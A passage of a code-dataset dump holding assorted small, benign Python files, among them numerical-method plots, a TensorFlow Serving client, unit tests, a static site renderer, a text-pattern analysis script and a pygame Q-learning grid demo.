np.zeros(Nt+1)\n\nu[0] = I\nfor n in range(Nt):\n u[n+1] = u[n]*( 1 + dt*np.sin(t[n]) )\n \nimport matplotlib.pyplot as plt\nplt.figure()\nplt.plot(t, u, 'r--o')\nt_fine = np.linspace(0, t[-1], 101) # for u_ex\nu_ex = I*np.exp( 1 - np.cos(t_fine) )\nplt.xlabel('t')\nplt.ylabel('u')\nplt.plot(t_fine, u_ex, 'b-')\nplt.legend(['numerical','exact'], loc='upper left')\ndt = t[1] - t[0]\nplt.title('dt=%g' % dt)\numin = 1.1*u_ex.min(); umax = 0.5\nplt.axis([t[0], t[-1], umin, umax])\nplt.grid(True)\nplt.show()\n\n","sub_path":"Euler_v0.py","file_name":"Euler_v0.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"628918805","text":"from grpc.beta import implementations\nimport numpy\nimport tensorflow as tf\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_service_pb2\n\ntf.app.flags.DEFINE_string('server', 'localhost:8500', 'PredictionService host:port')\nFLAGS = tf.app.flags.FLAGS\n\n\ndef do_inference(hostport):\n \"\"\"Tests PredictionService with concurrent requests.\n Args:\n hostport: Host:port address of the Prediction Service.\n Returns:\n pred values, ground truth label\n \"\"\"\n # create connection\n host, port = hostport.split(':')\n channel = implementations.insecure_channel(host, int(port))\n stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)\n\n # initialize a request\n request = predict_pb2.PredictRequest()\n request.model_spec.name = 'rnn_emoji_prediction'\n request.model_spec.signature_name = 'predict_words'\n\n # Randomly generate some test data\n num_steps = 30\n words = [\"I love you\"]\n padded_words = words + [\"_PAD\"] * (num_steps - len(words))\n request.inputs['input_data_words'].CopyFrom(\n tf.contrib.util.make_tensor_proto([padded_words], shape=[1, num_steps]))\n request.inputs['k'].CopyFrom(\n tf.contrib.util.make_tensor_proto(3, shape=[]))\n\n\n\n\n #\n # # Randomly generate some test data\n # temp_data = numpy.random.randn(10, 3).astype(numpy.float32)\n # data, label = temp_data, numpy.sum(temp_data * numpy.array([1, 2, 3]).astype(numpy.float32), 1)\n # request.inputs['input'].CopyFrom(\n # tf.contrib.util.make_tensor_proto(data, shape=data.shape))\n\n # predict\n result = stub.Predict(request, 5.0) # 5 seconds\n return result\n\n\ndef main(_):\n if not FLAGS.server:\n print('please specify server host:port')\n return\n\n result = do_inference(FLAGS.server)\n print('Result is: ', result)\n\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"295200622","text":"from unittest.mock import patch\n\nimport pytest\n\nfrom minitor.main import Alert\nfrom minitor.main import Monitor\n\n\nclass TestAlert(object):\n\n @pytest.fixture\n def monitor(self):\n return Monitor({\n 'name': 'Dummy Monitor',\n 'command': ['echo', 'foo'],\n })\n\n @pytest.fixture\n def echo_alert(self):\n return Alert(\n 'log',\n {\n 'command': [\n 'echo', (\n '{monitor_name} has failed {failure_count} time(s)!\\n'\n 'We have alerted {alert_count} time(s)'\n )\n ]\n }\n )\n\n def test_simple_alert(self, monitor, echo_alert):\n monitor.total_failure_count = 1\n monitor.alert_count = 1\n with patch.object(echo_alert.logger, 'error') as mock_error:\n echo_alert.alert(monitor)\n mock_error.assert_called_once_with(\n 'Dummy Monitor has failed 1 time(s)!\\n'\n 'We have alerted 1 time(s)'\n )\n","sub_path":"tests/alert_test.py","file_name":"alert_test.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"456427504","text":"\"\"\"\n部门聚餐,下大雨,要将所有人从食堂运到办公室。\n现在由大伞和小伞,小伞一次撑2个人,大伞一次撑3个人\n在最开始时食堂的人有一把小伞,办公室里有n把小伞,m把大伞。\n从办公室到食堂的往返时间为2小伞,去1h,回1h。\n每个人一次只能带一把伞。\n求所有人回到办公室的最短时间。\n输入:\n一个数字T,T组数据\n每组为c n m,代表人数,小伞数,大伞数\n测试用例:c=11 n=1 m=2\n\"\"\"\n\n\ndef func(c, n, m):\n left_num = c\n left_u2 = 1\n left_u3 = 0\n count = 0\n right_num = 0\n while left_num > 0:\n count += 1 # 送\n left_num = left_num - left_u2 * 2 + left_u3 * 3\n if left_num <= 0:\n break\n else:\n right_num = c - left_num\n # 回去送伞\n count += 1\n back_num = min(right_num, n + m + 1) # 回去人数\n left_num = left_num + back_num\n # 更新带去新伞数量: 优先大伞\n left_u3 = min(back_num, m)\n left_u2 = back_num - left_u3\n return count\n\n\nprint(func(11, 1, 2)) # ???\n\n\"\"\"\n11 -> 2 -> (9, 2)\n11 <- 2(0, 2)\n11 -> 6 ->(5, 6)\n9 <- 4(2, 2)\n9 -> 9 -> ok\n\"\"\"\n","sub_path":"algo/送伞问题.py","file_name":"送伞问题.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"410988154","text":"import random\nsum = 0\ncount = 0\nfor x in range(2, 101, 2):\n if x % 4 == 0:\n count += 1\n # print('This value:%d is eligible',x)\n sum += x\nprint('The first time sum:%d, count:%d' % (sum, count))\n\nsum = 0\nwhile sum < 100:\n sum += random.randint(1, 100)\nprint('sum:%d' % sum)","sub_path":"DailyCode/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"391730904","text":"import unittest\nfrom metacram import Dna, Record\n\nclass TestDna(unittest.TestCase):\n \n def setUp(self):\n pass\n \n def testParseFasta(self):\n with open('data/test.fasta') as handle:\n records = Dna(handle, type='fasta')\n self.assertEqual(len(list(records)), 5)\n \n def testParseFastq(self):\n with open('data/test.fastq') as handle:\n records = Dna(handle, type='fastq')\n self.assertEqual(len(list(records)), 5)\n \n def testParseQseq(self):\n with open('data/test.qseq') as handle:\n records = Dna(handle, type='qseq')\n self.assertEqual(len(list(records)), 5)\n\nclass TestRecord(unittest.TestCase):\n \n def testCreateFastaRecord(self):\n header, sequence = 'foo', 'GATC'\n record = Record(header, sequence)\n \n self.assertEqual(record.header, header)\n \n self.assertEqual(record.sequence, sequence)\n \n def testCreateFastqRecord(self):\n header, sequence, quality = 'foo', 'GATC', [10, 10, 10, 10]\n \n record = Record(header, sequence, quality)\n \n self.assertEqual(record.header, header)\n \n self.assertEqual(record.sequence, sequence)\n \n self.assertEqual(record.quality, quality)\n \n def testFormatPrinting(self):\n header, sequence, quality = 'foo', 'GATC', [10, 10, 10, 10]\n \n record = Record(header, sequence, quality)\n \n self.assertEqual(record.fasta, '>foo\\nGATC')\n self.assertEqual(record.fastq, '@foo\\nGATC\\n+foo\\n++++')\n \n # fails: self.assertRaises(Exception, record.qseq)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/dnaio.py","file_name":"dnaio.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"286912788","text":"from service import Service\nfrom settings import DIM, apple_count\n\n\nclass UI:\n def __init__(self):\n self.service = Service()\n\n def place_apples(self):\n self.service.place_apples(apple_count)\n\n def place_snake(self):\n self.service.place_snake()\n\n def print(self):\n matrix = self.service.storage()\n for i in range(DIM):\n for j in range(DIM):\n print('+---', end='')\n print('+')\n\n for j in range(DIM):\n if j == 0:\n print('| ', end='')\n if matrix[i][j] == 1:\n print('. | ', end='')\n elif matrix[i][j] == 0:\n print(' | ', end='')\n elif matrix[i][j] == 2:\n print('+ | ', end='')\n else:\n print('* | ', end='')\n print()\n for j in range(DIM):\n print('+---', end='')\n print('+')\n\n def move(self, cmd):\n if cmd == '':\n self.service.move(1)\n else:\n self.service.move(cmd)\n\n def change_up(self):\n self.service.change_dir('up')\n\n def change_down(self):\n self.service.change_dir('down')\n\n def change_left(self):\n self.service.change_dir('left')\n\n def change_right(self):\n self.service.change_dir('right')\n\n def start(self):\n try:\n self.place_snake()\n self.place_apples()\n self.print()\n while True:\n cmd = input()\n if cmd[:4] == 'move':\n self.move(cmd[5:])\n elif cmd[:2] == 'up':\n self.change_up()\n elif cmd[:4] == 'down':\n self.change_down()\n elif cmd[:4] == 'left':\n self.change_left()\n elif cmd[:5] == 'right':\n self.change_right()\n else:\n print('Invalid input!')\n self.print()\n except Exception as e:\n print(str(e))\n","sub_path":"e1-916-Popa-Andrei-Calin/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29192258","text":"import argparse\nimport os\nfrom jinja2 import nodes\nfrom jinja2.exceptions import TemplateSyntaxError\nfrom jinja2.ext import Extension\nimport markdown2\nfrom staticjinja import make_site\n\n\nclass CleanLinkExtension(Extension):\n tags = set(['cleanlink'])\n clean_links = True\n\n def parse(self, parser):\n stream = parser.stream\n tag = stream.next()\n\n if stream.current.test('string'):\n url = parser.parse_expression()\n else:\n raise TemplateSyntaxError(\"'%s' requires url\" %\n tag.value, tag.lineno)\n\n body = parser.parse_statements(['name:endcleanlink'], drop_needle=True)\n return nodes.CallBlock(self.call_method('_clean_link', [url]),\n [], [], body).set_lineno(tag.lineno)\n\n def _clean_link(self, url, caller):\n inner = caller()\n if self.clean_links:\n url = url.replace('index.html', '')\n url = url.replace('.html', '')\n return '{inner}'.format(url=url, inner=inner)\n\n\ndef get_post_contents(template):\n with open(template.filename) as f:\n html = markdown2.markdown(f.read(), extras=['metadata'])\n context = html.metadata\n context['post'] = html\n return context\n\n\ndef render_post(env, template, **kwargs):\n post_template = env.get_template(\"_post.html\")\n post_path, post_filename = os.path.split(template.name)\n post_title, _ = post_filename.split('.')\n out_filename = '{}.html'.format(post_title)\n out_path = os.path.join(env.outpath, post_path)\n if post_path and not os.path.exists(out_path):\n os.makedirs(out_path)\n out = os.path.join(out_path, out_filename)\n post_template.stream(**kwargs).dump(out)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--watch', dest='watch', action='store_true',\n help='Keep running and watch for changes')\n parser.add_argument('--clean', dest='clean', action='store_true',\n help='Use clean links')\n args = parser.parse_args()\n\n CleanLinkExtension.clean_links = args.clean\n\n site = make_site(\n outpath='output',\n extensions=[\n CleanLinkExtension ],\n staticpaths=['goattower/static/', 'static/'],\n contexts=[\n ('.*.md', get_post_contents) ],\n rules=[\n ('.*.md', render_post) ] )\n\n site.render(use_reloader=args.watch)\n","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510630488","text":"# -*- encoding: utf-8 -*-\n\n\"\"\"\n Digitre\n ~~~~~~~\n A simple Machine Learning application to recognize handwritten digits.\n\n digitre_classifier.py includes a class with functionality to preprocess base64-encoded\n handwritten digit images and classify the digit in the image.\n\n :copyright: (c) 2017 by Luis Vale Silva.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\n__author__ = \"Luis Vale Silva\"\n__status__ = \"Development\"\n\nimport os\nimport digitre_preprocessing as prep\nimport digitre_model\n\nclass Classifier(object):\n \"\"\"\n Given base64-encoded image, transforms it to the appropriate format and predicts\n digit class.\n\n Classifier prepares base64-encoded image of handwritten digit (hopefully...) from\n html canvas by:\n . Converting it to numpy 3D array\n . Cropping it to square of minimum size around drawing (no smaller than of 28 x 28)\n . Centering it on its center of mass\n . Resizing it to 28 x 28\n . MinMax transforming pixel values between 0 and 255 to values between 0 and 1\n It then uses pre-trained machine learning model to predict digit class, with the\n output being the probability distribution over the 10 classes (0 to 9).\n\n Parameters\n ----------\n file_name: str, default='cnn.tflearn'\n File name of pre-trained TFLearn model\n copy : boolean, optional, default True\n Set to False to perform inplace row normalization and avoid a\n copy (if the input is already a numpy array).\n \"\"\"\n\n def __init__(self, file_name='cnn.tflearn'):\n cwd = os.path.dirname(__file__)\n # Load the model\n self.model = digitre_model.build()\n self.model.load(os.path.join(cwd, file_name))\n\n\n def preprocess(self, digit_image):\n \"\"\"\n Get digit drawn by user as base64 image and preprocess it for classification.\n\n Parameters\n ----------\n digit_image: string\n String of base64-encoded image of user drawing in html canvas.\n Returns\n -------\n Processed image as numpy 3D array ready for classification\n \"\"\"\n digit = prep.b64_str_to_np(digit_image)\n digit = prep.crop_img(digit)\n digit = prep.center_img(digit)\n digit = prep.resize_img(digit)\n digit = prep.min_max_scaler(digit, final_range=(0, 1))\n digit = prep.reshape_array(digit)\n return digit\n\n def classify(self, preprocessed_image):\n \"\"\"\n Get a preprocessed digit drawn by user and classify it as a digit from 0 to 9.\n\n Parameters\n ----------\n preprocessed_image: 4D numpy ndarray, shape=(1, 28, 28, 1)\n Image array to classify.\n Returns\n -------\n Image as numpy 3D array\n \"\"\"\n return self.model.predict(preprocessed_image)\n","sub_path":"digitre/digitre_classifier.py","file_name":"digitre_classifier.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"213864147","text":"from glob import glob\r\nimport pandas as pd\r\nimport re\r\nfrom pprint import pprint\r\nimport string\r\nfrom nltk.tokenize import word_tokenize\r\nfrom collections import defaultdict\r\nimport json\r\n\r\nimport codecs\r\nimport random\r\n\r\n\r\n# clean query and get pattern\r\ndef clean_query(query):\r\n\r\n ## string punctuation\r\n ## https://www.geeksforgeeks.org/string-punctuation-in-python/\r\n # excluding <>, _ since _ will insdie filt tag and / will be insdie tag\r\n \r\n punctuation = [p for p in string.punctuation if p != '<' and p != '>' and p != '_' and p != '/']\r\n\r\n ## remove exclude words\r\n ## ? might be a can be removed as well\r\n exclude_words = ['hey', 'cortana', 'the']\r\n\r\n ## remove punctutation\r\n query = ''.join(ch for ch in query if ch not in set(punctuation))\r\n query_filtered = [w for w in word_tokenize(query.lower()) if w not in exclude_words]\r\n\r\n ## \"< \" , \" >\" remove extra space \r\n return \" \".join(query_filtered).replace(\"< \",\"<\").replace(\" >\",\">\")\r\n\r\n'''\r\ndef clean_query(query):\r\n\r\n ## string punctuation\r\n ## https://www.geeksforgeeks.org/string-punctuation-in-python/\r\n # excluding <>\r\n # so _ will be replace eg: file_keyword becomes filekeyword\r\n punctuation = [p for p in string.punctuation if p != '<' and p != '>']\r\n\r\n ## remove exclude words\r\n ## ? might be a can be removed as well\r\n exclude_words = ['hey', 'cortana', 'the']\r\n\r\n ## remove punctutation\r\n query = ''.join(ch for ch in query if ch not in set(punctuation))\r\n query_filtered = [w for w in word_tokenize(query.lower()) if w not in exclude_words]\r\n\r\n ## \"< \" , \" >\" remove extra space \r\n return \" \".join(query_filtered).replace(\"< \",\"<\").replace(\" >\",\">\")\r\n'''\r\n\r\n\r\n# clean query and get pattern\r\n#eg: a to \r\ndef reduce_xml_tag_and_remove_xml_value(pattern):\r\n xmlpairs = re.findall(\"(<.*?>.*?<\\/.*?>)\", pattern)\r\n\r\n # for debug \r\n #print('originl pattern before reduce {}'.format(pattern))\r\n\r\n\r\n for xmlpair in xmlpairs:\r\n # extra type and value for xml tag\r\n xmlTypeEndInd = xmlpair.find(\">\")\r\n\r\n xmlType = xmlpair[1:xmlTypeEndInd]\r\n\r\n pattern = pattern.replace(xmlpair, \"<\"+xmlType+\">\")\r\n\r\n\r\n pattern.strip()\r\n # for debug \r\n #print('originl pattern before reduce {}'.format(pattern))\r\n return pattern\r\n\r\n\r\ndef process_tagged_queries(queries, annotated_queries, intents, domain, DomainToSlotsProcess):\r\n # assert(len(annotated_queries)==len(queries), \"Invalid query, annotation set\")\r\n \r\n # if needed, change this to list to also store list of queries under a pattern\r\n\r\n ## deduplicate patterns\r\n pattern_queries = defaultdict(int)\r\n pattern_queries_to_annotated_queries = defaultdict()\r\n pattern_queries_to_intent = defaultdict()\r\n\r\n \r\n tags = ['sharetarget_name', 'file_name', 'file_type', 'sharetarget_type', 'order_ref', 'to_contact_name', 'date', 'files_keyword',\r\n 'file_action', 'file_action_context', 'file_keyword', 'file_folder', 'meeting_starttime', 'contact_name', 'file_recency']\r\n\r\n\r\n ## dictionary of list\r\n ## key : xml_name\r\n ## value : list of possible values inside <> \r\n tag_values = defaultdict(list)\r\n\r\n\r\n for query, ann_query, intent in zip(queries, annotated_queries, intents):\r\n # print(query)\r\n\r\n ## using originla query to create new patterns\r\n new_query = query\r\n new_annotation = ann_query\r\n\r\n # for debug\r\n #print('annotated query {}'.format(new_annotation)) \r\n\r\n ## extract all constraints (XML pair) from ann_query\r\n # new routine ,extract \r\n xmlpairs = re.findall(\"(<.*?>.*?<\\/.*?>)\", ann_query)\r\n\r\n for xmlpair in xmlpairs:\r\n # extra type and value for xml tag\r\n xmlTypeEndInd = xmlpair.find(\">\")\r\n\r\n xmlType = xmlpair[1:xmlTypeEndInd]\r\n\r\n xmlValue = xmlpair.replace(\"<\"+xmlType+\">\", \"\")\r\n xmlValue = xmlValue.replace(\"\", \"\")\r\n xmlValue = xmlValue.strip()\r\n\r\n # only extra certain slots to form pattens\r\n if domain in DomainToSlotsProcess and xmlType.lower() in DomainToSlotsProcess[domain]:\r\n\r\n \r\n #if xmlType.lower() == 'message_type':\r\n # print('{}'.format(xmlValue))\r\n # print('{}'.format(new_query))\r\n\r\n tag_values[xmlType].extend(xmlValue)\r\n\r\n if xmlType == 'message_type':\r\n new_query = new_query.replace(xmlValue, '')\r\n new_annotation = new_annotation.replace(xmlpair, '')\r\n else:\r\n new_query = new_query.replace(xmlValue, '<{}>'.format(xmlType.lower()))\r\n\r\n #if xmlType.lower() == 'message_type':\r\n # print('{}'.format(new_query))\r\n # print('{}'.format(clean_query(new_query)))\r\n\r\n new_annotation = new_annotation.replace(xmlpair, '<{}>'.format(xmlType.lower()))\r\n\r\n # old routine, all tags being processed\r\n '''\r\n for tag in tags:\r\n keywords = re.findall(rf'<{tag}>(.+?)<\\/{tag}>', ann_query)\r\n \r\n #collecting the variables to fill tag\r\n ## ? keyword do not preprocessing eg: 3S api spec do not do tokenization\r\n tag_values[tag].extend([kw.lower() for kw in keywords])\r\n \r\n # stripping query of tags\r\n ## using originla query to create new annotated query\r\n ## eg: search for 3s api deck, => search for deck since 3s api is tagged as slot in annotated_query \r\n for kw in keywords:\r\n new_query = query.replace(kw, '<{}>'.format(tag))\r\n\r\n '''\r\n\r\n #for debug\r\n #print('{}'.format(new_query))\r\n #print('{}'.format(clean_query(new_query)))\r\n\r\n pattern_queries[clean_query(new_query)] += 1\r\n\r\n # format: a \r\n #pattern_queries_to_annotated_queries[clean_query(new_query)] = clean_query(new_annotation)\r\n # \r\n pattern_queries_to_annotated_queries[clean_query(new_query)] = reduce_xml_tag_and_remove_xml_value(clean_query(new_annotation))\r\n pattern_queries_to_intent[clean_query(new_query)] = intent\r\n\r\n print('-I-: Given queries {}, domain {}, total patterns are {}'.format(len(queries),domain, len(pattern_queries)))\r\n return pattern_queries, tag_values,pattern_queries_to_annotated_queries, pattern_queries_to_intent\r\n\r\n## read *.tsv name and output .txt fils\r\n## txt format: each filename / keypharse will be single line\r\n## tag means slot value here. rename it since it is confusing\r\n'''\r\ndef extract_additional_tags(filename):\r\n tags = []\r\n df = pd.read_csv(filename, sep='\\t', encoding=\"utf-8\")\r\n for val in df.List.values:\r\n tags.extend(val.split(';'))\r\n \r\n with open(filename.replace(\".tsv\", \".txt\"), 'w', encoding='utf-8') as f:\r\n for tag in tags:\r\n f.write('{}\\n'.format(tag))\r\n \r\n# step1\r\nextract_additional_tags(\"additionalfilenames.tsv\")\r\nextract_additional_tags(\"additionalfilenameskeyphrases.tsv\")\r\n'''\r\n\r\n\r\n\r\nfileTypeMSB = set()\r\nwith codecs.open('E:\\\\fileAnswer_data_synthesis\\\\CMF_training\\\\files_MSB_measurement_build\\placeholder_tags_chiecha\\\\file_type.txt', 'r', 'utf-8') as fin:\r\n for line in fin:\r\n line = line.strip()\r\n fileTypeMSB.add(line)\r\n\r\n# for deubg\r\nprint(fileTypeMSB)\r\n\r\nfileTypeMSB = list(fileTypeMSB)\r\n\r\n\r\nfileActionMSB = set()\r\nwith codecs.open('E:\\\\fileAnswer_data_synthesis\\\\CMF_training\\\\files_MSB_measurement_build\\placeholder_tags_chiecha\\\\file_action.txt', 'r', 'utf-8') as fin:\r\n for line in fin:\r\n line = line.strip()\r\n fileActionMSB.add(line)\r\n\r\n# for deubg\r\nprint(fileActionMSB)\r\n\r\nfileActionMSB = list(fileActionMSB)\r\n\r\n\r\n\r\n\r\n# tepm folder\r\ntrainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm\\\\tmp\\\\train.tsv'\r\ntrainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm_09162021v1_test12_temp8\\\\domain_svm\\\\tmp\\\\train.tsv'\r\n#trainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm_09162021v1_test12_temp7\\\\domain_svm\\\\tmp\\\\train.tsv'\r\n#trainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm_09162021v1_test12_temp6\\\\domain_svm\\\\tmp\\\\train.tsv'\r\n#trainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm_09162021v1_test12_temp5\\\\domain_svm\\\\tmp\\\\train.tsv'\r\n# E:\\msb_domain_aether\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\domain_svm_09162021v1_test12_temp6\\domain_svm\\tmp\r\ndf = pd.read_csv(trainfile, sep='\\t', encoding=\"utf-8\", keep_default_na=False, dtype={\r\n 'Query': str, 'Class': str})\r\n\r\n\r\npositive_df = df[df.Class == 'files']\r\nnegative_df = df[df.Class != 'files']\r\n\r\n\r\nfor fileAction in sorted(fileActionMSB):\r\n\r\n \r\n df1 = positive_df.loc[positive_df['Query'].str.contains(fileAction, case=False)]\r\n df2 = negative_df.loc[negative_df['Query'].str.contains(fileAction, case=False)]\r\n\r\n print(\"key : {}\".format(fileAction))\r\n\r\n #print(df1.head)\r\n #print(df2.head)\r\n\r\n\r\n print(df1.shape[0])\r\n print(df2.shape[0])\r\n\r\n\r\n# print('Total postive queries found: {} | Total patterns: {}'.format(pos_queries_cnt, len(all_patterns)))\r\n\r\n# for tag, values in all_tags.items():\r\n# with open('./placeholder_tags/{}.txt'.format(tag.replace(\"_\",\"\")), 'w', encoding='utf-8') as f:\r\n# for value in set(values):\r\n# f.write(value+'\\n')\r\n ","sub_path":"files domain/contexual_lu_data_generator/domain/slot_distribution_analysis.py","file_name":"slot_distribution_analysis.py","file_ext":"py","file_size_in_byte":9647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"489718153","text":"import pygame, sys\nimport threading\nfrom pygame.locals import *\nfrom run import *\n\nWHITE = (255, 255, 255)\nGRAY = (155, 155, 155)\nBLACK = (0, 0, 0)\nMAINBACKCOLOR = (128, 64, 64)\n\nWINW = 1024\nWINW_CENTER = WINW/2\nWINH = 768\nWINH_CENTER = WINH/2 + 50\n\nmainClock = pygame.time.Clock()\npygame.init()\npygame.display.set_caption('Q-Learning')\nscreen = pygame.display.set_mode((WINW, WINH))\nfont = pygame.font.SysFont('Segoe UI', 24)\n\ncolor_active = WHITE\ncolor_passive = GRAY\n\nclick = False\n\ndef set_box_color(value, color_input):\n if value == True:\n color_input = color_active\n return color_input\n else:\n color_input = color_passive\n return color_input\n\ndef draw_text(text, font, color, surface, x, y):\n textobj = font.render(text, 1, color)\n textrect = textobj.get_rect()\n textrect.topleft = (x, y)\n surface.blit(textobj, textrect)\n\ndef main_menu():\n\n start_x = ''\n sx_rect = pygame.Rect(WINW_CENTER + 100, WINH_CENTER - 200, 40, 30)\n active_sx = False\n color_input_sx = color_passive\n\n start_y = ''\n sy_rect = pygame.Rect(WINW_CENTER + 100, WINH_CENTER - 150, 40, 30)\n active_sy = False\n color_input_sy = color_passive\n\n end_x = ''\n ex_rect = pygame.Rect(WINW_CENTER + 100, WINH_CENTER - 50, 40, 30)\n active_ex = False\n color_input_ex = color_passive\n\n end_y = ''\n ey_rect = pygame.Rect(WINW_CENTER + 100, WINH_CENTER, 40, 30)\n active_ey = False\n color_input_ey = color_passive\n \n button_go_text = 'SOLVE'\n button_go = pygame.Rect(WINW_CENTER - 50, WINH_CENTER + 100, 100, 40)\n color_button_go = WHITE\n\n while True:\n screen.fill(MAINBACKCOLOR)\n draw_text('# Setting up Start & End Points (50 x 50) #', font, WHITE, screen, WINW_CENTER - 220, WINH_CENTER - 300)\n\n draw_text('Start Point X Position : ', font, WHITE, screen, WINW_CENTER - 150, WINH_CENTER - 200)\n color_input_sx = set_box_color(active_sx, color_input_sx)\n pygame.draw.rect(screen, color_input_sx, sx_rect, 2)\n draw_text(start_x, font, WHITE, screen, sx_rect.x + 8, sx_rect.y - 2)\n\n draw_text('Start Point Y Position : ', font, WHITE, screen, WINW_CENTER - 150, WINH_CENTER - 150)\n color_input_sy = set_box_color(active_sy, color_input_sy)\n pygame.draw.rect(screen, color_input_sy, sy_rect, 2)\n draw_text(start_y, font, WHITE, screen, sy_rect.x + 8, sy_rect.y - 2)\n\n draw_text('End Point X Position : ', font, WHITE, screen, WINW_CENTER - 150, WINH_CENTER - 50)\n color_input_ex = set_box_color(active_ex, color_input_ex)\n pygame.draw.rect(screen, color_input_ex, ex_rect, 2)\n draw_text(end_x, font, WHITE, screen, ex_rect.x + 8, ex_rect.y - 2)\n\n draw_text('End Point Y Position : ', font, WHITE, screen, WINW_CENTER - 150, WINH_CENTER)\n color_input_ey = set_box_color(active_ey, color_input_ey)\n pygame.draw.rect(screen, color_input_ey, ey_rect, 2)\n draw_text(end_y, font, WHITE, screen, ey_rect.x + 8, ey_rect.y - 2)\n\n pygame.draw.rect(screen, GRAY, button_go)\n draw_text(button_go_text, font, MAINBACKCOLOR, screen, button_go.x + 16, button_go.y + 2)\n \n mx, my = pygame.mouse.get_pos()\n if button_go.collidepoint(mx, my):\n if click:\n game(start_x, start_y, end_x, end_y)\n\n click = False\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if sx_rect.collidepoint(event.pos):\n active_sx = True\n else:\n active_sx = False\n if sy_rect.collidepoint(event.pos):\n active_sy = True\n else:\n active_sy = False\n if ex_rect.collidepoint(event.pos):\n active_ex = True\n else:\n active_ex = False\n if ey_rect.collidepoint(event.pos):\n active_ey = True\n else:\n active_ey = False\n \n if event.button == 1:\n click = True\n\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n if active_sx == True:\n if event.key == K_BACKSPACE:\n start_x = ''\n else:\n key = str(event.unicode)\n if key.isdecimal() and len(start_x)<2:\n start_x += event.unicode\n if active_sy == True:\n if event.key == K_BACKSPACE:\n start_y = ''\n else:\n key = str(event.unicode)\n if key.isdecimal() and len(start_y)<2:\n start_y += event.unicode\n if active_ex == True:\n if event.key == K_BACKSPACE:\n end_x = ''\n else:\n key = str(event.unicode)\n if key.isdecimal() and len(end_x)<2:\n end_x += event.unicode\n if active_ey == True:\n if event.key == K_BACKSPACE:\n end_y = ''\n else:\n key = str(event.unicode)\n if key.isdecimal() and len(end_y)<2:\n end_y += event.unicode\n\n pygame.display.update()\n mainClock.tick(60)\n\n\ndef game(start_x, start_y, end_x, end_y):\n running = True\n\n if start_x == '':\n start_x = 0\n if start_y == '':\n start_y = 0\n if end_x == '':\n end_x = 49\n if end_y == '':\n end_y = 49\n\n app = Run(int(start_x),int(start_y),int(end_x),int(end_y))\n\n t1 = threading.Thread(target=app.train)\n t1.daemon = True\n t1.start()\n \n while running:\n screen.fill(MAINBACKCOLOR)\n statex = app.getState()\n k=0\n for i in range(50):\n for j in range(50):\n pygame.draw.rect(screen, (app.game_board[k].color_r, app.game_board[k].color_g, app.game_board[k].color_b), (j * 15 + 135, i * 15 + 10, 14, 14))\n pygame.draw.circle(screen, MAINBACKCOLOR, (statex[1] * 15 + 142, statex[0] * 15 + 17), 7, 0)\n k+=1\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n pygame.quit()\n sys.exit()\n\n pygame.display.update()\n mainClock.tick(60)\n\nmain_menu()","sub_path":"QLearning/mainmenu.py","file_name":"mainmenu.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"230613795","text":"from itertools import *\n\nprint(\"Hello world!\")\n\nfor i, num in enumerate(range(54,65)):\n\tprint(\"Number {0} is {1}\".format(i,num))\n\nstupid=0\nwhile(True):\n\tdogName = input(\"Who is the best dog?\")\n\tif dogName==\"Laika\":\n\t\tprint(\"That's right! Oogibooboo!\")\n\t\tbreak\n\telse:\n\t\tstupid += 1\n\t\tprint(\"Errr hello??! You've got it wrong {0} time{1}\\nTry again...\".format(stupid, \"\" if stupid==1 else \"s, dummy\"))\n\t\t\nprint(\"Line added as part of Git set-up & testing.\")\nprint(\"Line added as an alteration under new 